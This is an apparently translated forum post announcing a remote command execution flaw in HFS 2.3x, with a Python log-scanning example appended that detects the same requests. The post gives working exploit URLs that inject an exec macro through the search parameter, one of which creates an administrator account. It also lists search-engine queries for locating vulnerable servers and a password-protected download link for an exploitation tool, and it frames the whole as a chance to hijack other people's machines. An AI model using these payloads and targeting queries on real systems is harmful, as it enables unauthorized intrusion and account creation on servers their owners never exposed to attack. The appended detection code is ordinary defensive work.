A vulnerability disclosed abroad around September 12: HFS 2.3x remote command execution! Doomsday has arrived for the bot herders~
Usage:
https://localhost:80/?search==%00{.exec|cmd.}
https://localhost:80/search=%00{.exec|cmd.}
Example (adding an account): https://localhost:80/?search==%00{.exec|cmd.exe%20/c%20net%20user%20admin%20admin%20/add.}
(Note: in some versions there is no ? before search)
Search methods:
0x1: ZoomEye search: https://www.zoomeye.org/search?q=HFS+2.3
0x2: Google hack: intext:服务器信息 随波汉化版.exe
Attached is a small exploitation tool written by a friend:
Download link: https://pan.baidu.com/s/1mgyY6Qc Password: i2o0
Source: 小威博客
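A detection-side view of the request pattern shown under Usage, as an added example that is not part of the original post: it flags access-log entries whose search parameter carries a NUL byte followed by an HFS macro opener, with or without the leading ?. The common log format (for instance from a reverse proxy in front of HFS), the sample entries and the function names are assumptions.

```python
import re
from urllib.parse import unquote

# Client address and request target of a common-log-format entry (assumed format).
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# "search=" (with or without a leading "?"), then a NUL byte, then an
# HFS macro opener "{.name". Covers both URL forms shown in the post.
MACRO_RE = re.compile(r'search=+[^&]*?\x00\{\.(\w+)', re.IGNORECASE)

# Constructed sample entries (documentation IP addresses, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /?search=report HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2024:10:00:01 +0000] "GET /?search==%00{.exec|cmd.} HTTP/1.1" 200 512',
    '192.0.2.12 - - [01/Jan/2024:10:00:02 +0000] "GET /search=%00{.exec|cmd.} HTTP/1.1" 200 512',
    '192.0.2.13 - - [01/Jan/2024:10:00:03 +0000] "GET /?search=%7Bnotes%7D HTTP/1.1" 200 512',
]


def find_hfs_macro(log_line):
    """Return (client, macro_name) if the entry matches the pattern, else None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    client, target = m.groups()
    # Decode percent-escapes first so %00 becomes a real NUL byte.
    decoded = unquote(target, encoding="latin-1")
    hit = MACRO_RE.search(decoded)
    return (client, hit.group(1).lower()) if hit else None


def scan(lines):
    """Collect every flagged (client, macro_name) pair from an iterable of log lines."""
    return [result for result in map(find_hfs_macro, lines) if result]


if __name__ == "__main__":
    for client, macro in scan(SAMPLE_LOG):
        print(f"{client}: NUL byte + HFS macro '{macro}' in search parameter")
```

Ordinary searches, including ones that merely contain braces, are not flagged; only the NUL byte followed by `{.` in the search value is.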